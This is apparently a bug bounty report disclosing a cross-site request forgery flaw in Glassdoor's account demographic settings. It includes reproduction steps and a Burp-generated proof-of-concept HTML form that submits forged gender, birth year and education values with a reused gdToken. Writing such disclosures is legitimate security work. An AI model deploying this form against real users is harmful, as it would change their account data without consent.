CSRF in Demographic Settings with valid gdtoken of other account

Hi Security Team, I found CSRF in account settings exactly in Demographic leads to change Brith Years and Gender . Steps To produce : 1.Creat to 2 account * [email protected] * [email protected] 2. Login with attacker account and Go to Demographic settings i change gender and brith years 3. Start burp and turn on intercept . 4.Capture the request and send it to reapeter 5. Generate CSRF POC : ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.glassdoor.com/member/account/settings_changeUserInformation.htm" method="POST"> <input type="hidden" name="newGender" value="FEMALE" /> <input type="hidden" name="birthYear" value="1940" /> <input type="hidden" name="highestEducation" value="HIGH&#95;SCHOOL" /> <input type="hidden" name="gdToken" value=" Attcker token" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` * Host This html code . * Now , Login to victim account . * Click Submit, BrithYears and Gender will changed . ## Impact Changin Demographic settings of users